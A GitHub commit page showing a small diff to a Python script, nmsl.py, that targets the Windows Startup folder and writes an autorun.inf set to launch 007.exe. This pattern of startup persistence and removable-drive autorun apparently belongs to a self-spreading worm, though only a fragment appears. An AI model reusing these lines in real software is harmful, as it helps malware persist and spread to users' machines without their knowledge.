Skip to content

Commit b708d3d

Browse files
authored
Update nmsl.py
1 parent ab9546c commit b708d3d

File tree

1 file changed

+1
-2
lines changed

1 file changed

+1
-2
lines changed

nmsl.py

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -8,8 +8,7 @@
88
work_home="C:\\Users\\{0}\\AppData\\Roaming\\Microsoft\\Windows\\{1}\\Programs\\Startup".format(os.getlogin(),'Start Menu')
99

1010
def writeconfig():
11-
autorun='''
12-
[autorun]
11+
autorun='''[autorun]
1312
open=007.exe
1413
icon=007.exe
1514
'''

0 commit comments

Comments
 (0)